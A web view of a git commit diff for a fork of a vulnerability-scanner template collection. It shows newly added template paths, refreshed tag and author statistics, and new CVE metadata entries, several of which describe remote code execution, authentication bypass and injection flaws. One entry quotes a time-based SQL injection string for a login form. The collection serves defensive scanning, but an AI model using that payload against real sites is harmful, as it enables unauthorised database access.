daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'projectdiscovery:main' into main

patch-1
Arm!tage 2023-08-16 16:31:03 +08:00 committed by GitHub
parent 743fcb0bb2 c63f14aef2
commit ea1bd7fbb2
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
128 changed files with 5687 additions and 3897 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

172
.new-additions
View File

@ -1,164 +1,8 @@
file/malware/aar-malware.yaml
file/malware/adzok-malware.yaml
file/malware/alfa-malware.yaml
file/malware/alienspy-malware.yaml
file/malware/alina-malware.yaml
file/malware/alpha-malware.yaml
file/malware/andromeda-malware.yaml
file/malware/ap0calypse-malware.yaml
file/malware/arcom-malware.yaml
file/malware/arkei-malware.yaml
file/malware/backoff-malware.yaml
file/malware/bandook-malware.yaml
file/malware/blacknix-malware.yaml
file/malware/blackworm-malware.yaml
file/malware/bluebanana-malware.yaml
file/malware/bozok-malware.yaml
file/malware/bublik-malware.yaml
file/malware/cap-hookexkeylogger-malware.yaml
file/malware/cerberus-malware.yaml
file/malware/clientmesh-malware.yaml
file/malware/crimson-malware.yaml
file/malware/cryptxxx-dropper-malware.yaml
file/malware/cryptxxx-malware.yaml
file/malware/cxpid-malware.yaml
file/malware/cythosia-malware.yaml
file/malware/darkrat-malware.yaml
file/malware/ddostf-malware.yaml
file/malware/derkziel-malware.yaml
file/malware/dexter-malware.yaml
file/malware/diamondfox-malware.yaml
file/malware/dmalocker-malware.yaml
file/malware/doublepulsar-malware.yaml
file/malware/eicar-malware.yaml
file/malware/erebus-malware.yaml
file/malware/ezcob-malware.yaml
file/malware/fudcrypt-malware.yaml
file/malware/gafgyt-bash-malware.yaml
file/malware/gafgyt-generic-malware.yaml
file/malware/gafgyt-hihi-malware.yaml
file/malware/gafgyt-hoho-malware.yaml
file/malware/gafgyt-jackmy-malware.yaml
file/malware/gafgyt-oh-malware.yaml
file/malware/genome-malware.yaml
file/malware/glass-malware.yaml
file/malware/glasses-malware.yaml
file/malware/gozi-malware.yaml
file/malware/gpgqwerty-malware.yaml
file/malware/greame-malware.yaml
file/malware/grozlex-malware.yaml
file/malware/hawkeye-malware.yaml
file/malware/imminent-malware.yaml
file/malware/infinity-malware.yaml
file/malware/insta11-malware.yaml
file/malware/intel-virtualization-malware.yaml
file/malware/iotreaper-malware.yaml
file/malware/linux-aesddos-malware.yaml
file/malware/linux-billgates-malware.yaml
file/malware/linux-elknot-malware.yaml
file/malware/linux-mrblack-malware.yaml
file/malware/linux-tsunami-malware.yaml
file/malware/locky-malware.yaml
file/malware/lostdoor-malware.yaml
file/malware/luminositylink-malware.yaml
file/malware/luxnet-malware.yaml
file/malware/macgyver-installer-malware.yaml
file/malware/macgyver-malware.yaml
file/malware/madness-malware.yaml
file/malware/miner--malware.yaml
file/malware/miniasp3-malware.yaml
file/malware/naikon-malware.yaml
file/malware/naspyupdate-malware.yaml
file/malware/notepad-malware.yaml
file/malware/olyx-malware.yaml
file/malware/osx-leverage-malware.yaml
file/malware/paradox-malware.yaml
file/malware/plasma-malware.yaml
file/malware/poetrat-malware.yaml
file/malware/pony-malware.yaml
file/malware/pubsab-malware.yaml
file/malware/punisher-malware.yaml
file/malware/pypi-malware.yaml
file/malware/pythorat-malware.yaml
file/malware/qrat-malware.yaml
file/malware/satana-dropper-malware.yaml
file/malware/satana-malware.yaml
file/malware/shimrat-malware.yaml
file/malware/shimratreporter-malware.yaml
file/malware/sigma-malware.yaml
file/malware/smallnet-malware.yaml
file/malware/snake-malware.yaml
file/malware/sub7nation-malware.yaml
file/malware/t5000-malware.yaml
file/malware/tedroo-malware.yaml
file/malware/terminator-malware.yaml
file/malware/teslacrypt-malware.yaml
file/malware/tox-malware.yaml
file/malware/treasurehunt-malware.yaml
file/malware/trickbot-malware.yaml
file/malware/trumpbot-malware.yaml
file/malware/universal-1337-malware.yaml
file/malware/unrecom-malware.yaml
file/malware/urausy-malware.yaml
file/malware/vertex-malware.yaml
file/malware/virusrat-malware.yaml
file/malware/wabot-malware.yaml
file/malware/warp-malware.yaml
file/malware/xhide-malware.yaml
file/malware/xor-ddos-malware.yaml
file/malware/yayih-malware.yaml
file/malware/zeghost-malware.yaml
file/malware/zoxpng-malware.yaml
http/cnvd/2021/CNVD-2021-41972.yaml
http/cnvd/2021/CNVD-2021-43984.yaml
http/cves/2018/CVE-2018-12909.yaml
http/cves/2018/CVE-2018-18809.yaml
http/cves/2018/CVE-2018-7653.yaml
http/cves/2019/CVE-2019-14750.yaml
http/cves/2019/CVE-2019-16057.yaml
http/cves/2019/CVE-2019-7192.yaml
http/cves/2022/CVE-2022-0169.yaml
http/cves/2022/CVE-2022-2414.yaml
http/cves/2022/CVE-2022-40843.yaml
http/cves/2023/CVE-2023-1698.yaml
http/cves/2023/CVE-2023-22478.yaml
http/cves/2023/CVE-2023-22480.yaml
http/cves/2023/CVE-2023-32117.yaml
http/cves/2023/CVE-2023-35082.yaml
http/cves/2023/CVE-2023-37580.yaml
http/cves/2023/CVE-2023-39120.yaml
http/cves/2023/CVE-2023-39143.yaml
http/default-logins/bloofoxcms-default-login.yaml
http/exposed-panels/acenet-panel.yaml
http/exposed-panels/bloofoxcms-login-panel.yaml
http/exposed-panels/discuz-panel.yaml
http/exposed-panels/kodak-network-panel.yaml
http/exposed-panels/mpsec-isg1000-panel.yaml
http/exposures/files/socks5-vpn-config.yaml
http/misconfiguration/bitbucket-auth-bypass.yaml
http/misconfiguration/casdoor-users-password.yaml
http/misconfiguration/clickhouse-unauth-api.yaml
http/misconfiguration/installer/yzmcms-installer.yaml
http/misconfiguration/mobsf-framework-exposure.yaml
http/misconfiguration/openstack-config.yaml
http/misconfiguration/oracle-reports-services.yaml
http/misconfiguration/sonarqube-projects-disclosure.yaml
http/vulnerabilities/apache/apache-solr-rce.yaml
http/vulnerabilities/bsphp-info.yaml
http/vulnerabilities/discuz/discuz-api-pathinfo.yaml
http/vulnerabilities/joomla/joomla-department-sqli.yaml
http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml
http/vulnerabilities/netmizer/netmizer-data-listing.yaml
http/vulnerabilities/other/acti-video-lfi.yaml
http/vulnerabilities/other/avcon6-execl-lfi.yaml
http/vulnerabilities/other/avcon6-lfi.yaml
http/vulnerabilities/other/clodop-printer-lfi.yaml
http/vulnerabilities/other/easyimage-downphp-lfi.yaml
http/vulnerabilities/other/kodak-network-lfi.yaml
http/vulnerabilities/other/sangfor-cphp-rce.yaml
http/vulnerabilities/other/sangfor-download-lfi.yaml
http/vulnerabilities/other/sangfor-sysuser-conf.yaml
http/vulnerabilities/wordpress/photo-gallery-xss.yaml
http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml
http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml
http/vulnerabilities/zzzcms/zzzcms-xss.yaml
http/cves/2021/CVE-2021-24409.yaml
http/cves/CVE-2015-9323.yaml
http/technologies/besu-server-detect.yaml
http/technologies/erigon-server-detect.yaml
http/technologies/geth-server-detect.yaml
http/technologies/nethermind-server-detect.yaml
network/jarm/c2/havoc-c2-jarm.yaml
ssl/c2/havoc-c2.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1992 | dhiyaneshdk | 1011 | http | 6158 | info | 3054 | file | 185 |
| panel | 966 | dwisiswant0 | 798 | workflows | 190 | medium | 1242 | dns | 17 |
| wordpress | 817 | daffainfo | 664 | file | 185 | high | 1225 | | |
| exposure | 764 | pikpikcu | 353 | network | 115 | critical | 737 | | |
| wp-plugin | 707 | pdteam | 281 | ssl | 24 | low | 223 | | |
| xss | 706 | pussycat0x | 276 | dns | 17 | unknown | 27 | | |
| osint | 666 | ritikchaddha | 229 | headless | 9 | | | | |
| tech | 623 | ricardomaia | 221 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 598 | geeknik | 221 | contributors.json | 1 | | | | |
| lfi | 560 | 0x_akoko | 179 | cves.json | 1 | | | | |
| cve | 2017 | dhiyaneshdk | 1045 | http | 6232 | info | 3185 | file | 309 |
| panel | 974 | dwisiswant0 | 798 | file | 309 | high | 1261 | dns | 17 |
| wordpress | 820 | daffainfo | 787 | workflows | 190 | medium | 1251 | | |
| exposure | 777 | pikpikcu | 353 | network | 115 | critical | 752 | | |
| xss | 713 | pussycat0x | 284 | ssl | 24 | low | 228 | | |
| wp-plugin | 711 | pdteam | 282 | dns | 17 | unknown | 29 | | |
| osint | 666 | ritikchaddha | 244 | headless | 9 | | | | |
| tech | 623 | geeknik | 221 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 598 | ricardomaia | 221 | contributors.json | 1 | | | | |
| lfi | 579 | theamanrawat | 179 | cves.json | 1 | | | | |
**468 directories, 6939 files**.
**475 directories, 7137 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

7104
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
| cve | 1992 | dhiyaneshdk | 1011 | http | 6158 | info | 3054 | file | 185 |
| panel | 966 | dwisiswant0 | 798 | workflows | 190 | medium | 1242 | dns | 17 |
| wordpress | 817 | daffainfo | 664 | file | 185 | high | 1225 | | |
| exposure | 764 | pikpikcu | 353 | network | 115 | critical | 737 | | |
| wp-plugin | 707 | pdteam | 281 | ssl | 24 | low | 223 | | |
| xss | 706 | pussycat0x | 276 | dns | 17 | unknown | 27 | | |
| osint | 666 | ritikchaddha | 229 | headless | 9 | | | | |
| tech | 623 | ricardomaia | 221 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 598 | geeknik | 221 | contributors.json | 1 | | | | |
| lfi | 560 | 0x_akoko | 179 | cves.json | 1 | | | | |
| cve | 2017 | dhiyaneshdk | 1045 | http | 6232 | info | 3185 | file | 309 |
| panel | 974 | dwisiswant0 | 798 | file | 309 | high | 1261 | dns | 17 |
| wordpress | 820 | daffainfo | 787 | workflows | 190 | medium | 1251 | | |
| exposure | 777 | pikpikcu | 353 | network | 115 | critical | 752 | | |
| xss | 713 | pussycat0x | 284 | ssl | 24 | low | 228 | | |
| wp-plugin | 711 | pdteam | 282 | dns | 17 | unknown | 29 | | |
| osint | 666 | ritikchaddha | 244 | headless | 9 | | | | |
| tech | 623 | geeknik | 221 | TEMPLATES-STATS.json | 1 | | | | |
| edb | 598 | ricardomaia | 221 | contributors.json | 1 | | | | |
| lfi | 579 | theamanrawat | 179 | cves.json | 1 | | | | |

10
cves.json
View File

@ -428,6 +428,7 @@
{"ID":"CVE-2017-7615","Info":{"Name":"MantisBT \u003c=2.30 - Arbitrary Password Reset/Admin Access","Severity":"high","Description":"MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2017/CVE-2017-7615.yaml"}
{"ID":"CVE-2017-7921","Info":{"Name":"Hikvision - Authentication Bypass","Severity":"critical","Description":"Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices contain an improper authentication issue. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2017/CVE-2017-7921.yaml"}
{"ID":"CVE-2017-7925","Info":{"Name":"Dahua Security - Configuration File Disclosure","Severity":"critical","Description":"A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-7925.yaml"}
{"ID":"CVE-2017-8229","Info":{"Name":"Amcrest IP Camera Web Management - Data Exposure","Severity":"critical","Description":"Amcrest IPM-721S V2.420.AC00.16.R.20160909 devices allow an unauthenticated attacker to download the administrative credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-8229.yaml"}
{"ID":"CVE-2017-8917","Info":{"Name":"Joomla! \u003c3.7.1 - SQL Injection","Severity":"critical","Description":"Joomla! before 3.7.1 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-8917.yaml"}
{"ID":"CVE-2017-9140","Info":{"Name":"Reflected XSS - Telerik Reporting Module","Severity":"medium","Description":"Cross-site scripting vulnerability in Telerik.ReportViewer.WebForms.dll in Telerik Reporting for ASP.NET WebForms Report Viewer control before R1 2017 SP2 (11.0.17.406) allows remote attackers to inject arbitrary web script or HTML via the bgColor parameter to Telerik.ReportViewer.axd.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-9140.yaml"}
{"ID":"CVE-2017-9288","Info":{"Name":"WordPress Raygun4WP \u003c=1.8.0 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Raygun4WP 1.8.0 contains a reflected cross-site scripting vulnerability via sendtesterror.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-9288.yaml"}
@ -645,6 +646,7 @@
{"ID":"CVE-2019-15043","Info":{"Name":"Grafana - Improper Access Control","Severity":"high","Description":"Grafana 2.x through 6.x before 6.3.4 is susceptible to improper access control. An attacker can delete and create arbitrary snapshots, leading to denial of service.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-15043.yaml"}
{"ID":"CVE-2019-15107","Info":{"Name":"Webmin \u003c= 1.920 - Unauthenticated Remote Command Execution","Severity":"critical","Description":"Webmin \u003c=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-15107.yaml"}
{"ID":"CVE-2019-15501","Info":{"Name":"L-Soft LISTSERV \u003c16.5-2018a - Cross-Site Scripting","Severity":"medium","Description":"L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15501.yaml"}
{"ID":"CVE-2019-15642","Info":{"Name":"Webmin \u003c 1.920 - Authenticated Remote Code Execution","Severity":"high","Description":"rpc.cgi in Webmin through 1.920 allows authenticated Remote Code Execution via a crafted object name because unserialise_variable makes an eval call. NOTE: the Webmin_Servers_Index documentation states \"RPC can be used to run any command or modify any file on a server, which is why access to it must not be granted to un-trusted Webmin users.\"\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2019/CVE-2019-15642.yaml"}
{"ID":"CVE-2019-15713","Info":{"Name":"WordPress My Calendar \u003c= 3.1.9 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin My Calendar \u003c= 3.1.9 is susceptible to reflected cross-site scripting which can be triggered via unescaped usage of URL parameters in multiple locations throughout the site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15713.yaml"}
{"ID":"CVE-2019-15811","Info":{"Name":"DomainMOD \u003c=4.13.0 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15811.yaml"}
{"ID":"CVE-2019-15858","Info":{"Name":"WordPress Woody Ad Snippets \u003c2.2.5 - Cross-Site Scripting/Remote Code Execution","Severity":"high","Description":"WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15858.yaml"}
@ -897,6 +899,7 @@
{"ID":"CVE-2020-27866","Info":{"Name":"NETGEAR - Authentication Bypass","Severity":"high","Description":"NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers are vulnerable to authentication bypass vulnerabilities which could allow network-adjacent attackers to bypass authentication on affected installations.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2020/CVE-2020-27866.yaml"}
{"ID":"CVE-2020-27982","Info":{"Name":"IceWarp WebMail 11.4.5.0 - Cross-Site Scripting","Severity":"medium","Description":"IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-27982.yaml"}
{"ID":"CVE-2020-27986","Info":{"Name":"SonarQube - Authentication Bypass","Severity":"high","Description":"SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,\nSVN, and GitLab credentials via the api/settings/values URI.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2020/CVE-2020-27986.yaml"}
{"ID":"CVE-2020-28185","Info":{"Name":"TerraMaster TOS \u003c 4.2.06 - User Enumeration","Severity":"medium","Description":"User Enumeration vulnerability in TerraMaster TOS \u003c= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2020/CVE-2020-28185.yaml"}
{"ID":"CVE-2020-28188","Info":{"Name":"TerraMaster TOS - Unauthenticated Remote Command Execution","Severity":"critical","Description":"TerraMaster TOS \u003c= 4.2.06 is susceptible to a remote code execution vulnerability which could allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php via the Event parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2020/CVE-2020-28188.yaml"}
{"ID":"CVE-2020-28208","Info":{"Name":"Rocket.Chat \u003c3.9.1 - Information Disclosure","Severity":"medium","Description":"Rocket.Chat through 3.9.1 is susceptible to information disclosure. An attacker can enumerate email addresses via the password reset function and thus potentially access sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2020/CVE-2020-28208.yaml"}
{"ID":"CVE-2020-28351","Info":{"Name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","Severity":"medium","Description":"Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING\u0026 page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2020/CVE-2020-28351.yaml"}
@ -1042,6 +1045,7 @@
{"ID":"CVE-2021-22205","Info":{"Name":"GitLab CE/EE - Remote Code Execution","Severity":"critical","Description":"GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-\u003chash\u003e.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-22205.yaml"}
{"ID":"CVE-2021-22214","Info":{"Name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","Severity":"high","Description":"GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:\n- CVE-2021-39935\n- CVE-2021-22214\n- CVE-2021-22175\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2021/CVE-2021-22214.yaml"}
{"ID":"CVE-2021-22502","Info":{"Name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","Severity":"critical","Description":"Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22502.yaml"}
{"ID":"CVE-2021-22707","Info":{"Name":"EVlink City \u003c R8 V3.4.0.1 - Authentication Bypass","Severity":"critical","Description":"A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2021/CVE-2021-22707.yaml"}
{"ID":"CVE-2021-22873","Info":{"Name":"Revive Adserver \u003c5.1.0 - Open Redirect","Severity":"medium","Description":"Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-22873.yaml"}
{"ID":"CVE-2021-22911","Info":{"Name":"Rocket.Chat \u003c=3.13 - NoSQL Injection","Severity":"critical","Description":"Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22911.yaml"}
{"ID":"CVE-2021-22986","Info":{"Name":"F5 iControl REST - Remote Command Execution","Severity":"critical","Description":"F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-22986.yaml"}
@ -1087,6 +1091,7 @@
{"ID":"CVE-2021-24389","Info":{"Name":"WordPress FoodBakery \u003c2.2 - Cross-Site Scripting","Severity":"medium","Description":"WordPress FoodBakery before 2.2 contains an unauthenticated reflected cross-site scripting vulnerability. It does not properly sanitize the foodbakery_radius parameter before outputting it back in the response.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24389.yaml"}
{"ID":"CVE-2021-24406","Info":{"Name":"WordPress wpForo Forum \u003c 1.9.7 - Open Redirect","Severity":"medium","Description":"WordPress wpForo Forum \u003c 1.9.7 is susceptible to an open redirect vulnerability because the plugin did not validate the redirect_to parameter in the login form of the forum, leading to an open redirect issue after a successful login.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24406.yaml"}
{"ID":"CVE-2021-24407","Info":{"Name":"WordPress Jannah Theme \u003c5.4.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24407.yaml"}
{"ID":"CVE-2021-24409","Info":{"Name":"Prismatic \u003c 2.8 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24409.yaml"}
{"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"}
{"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"}
{"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"}
@ -1561,6 +1566,7 @@
{"ID":"CVE-2022-24265","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/\u0026menu_filter=3 parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24265.yaml"}
{"ID":"CVE-2022-24266","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24266.yaml"}
{"ID":"CVE-2022-24288","Info":{"Name":"Apache Airflow OS Command Injection","Severity":"high","Description":"Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-24288.yaml"}
{"ID":"CVE-2022-24384","Info":{"Name":"SmarterTools SmarterTrack - Cross-Site Scripting","Severity":"medium","Description":"Cross-site Scripting (XSS) vulnerability in SmarterTools SmarterTrack This issue affects: SmarterTools SmarterTrack 100.0.8019.14010.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24384.yaml"}
{"ID":"CVE-2022-2462","Info":{"Name":"WordPress Transposh \u003c=1.0.8.1 - Information Disclosure","Severity":"medium","Description":"WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2462.yaml"}
{"ID":"CVE-2022-2467","Info":{"Name":"Garage Management System 1.0 - SQL Injection","Severity":"critical","Description":"Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2467.yaml"}
{"ID":"CVE-2022-24681","Info":{"Name":"ManageEngine ADSelfService Plus \u003c6121 - Stored Cross-Site Scripting","Severity":"medium","Description":"ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24681.yaml"}
@ -1816,6 +1822,7 @@
{"ID":"CVE-2022-46073","Info":{"Name":"Helmet Store Showroom - Cross Site Scripting","Severity":"medium","Description":"Helmet Store Showroom 1.0 is vulnerable to Cross Site Scripting (XSS).\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-46073.yaml"}
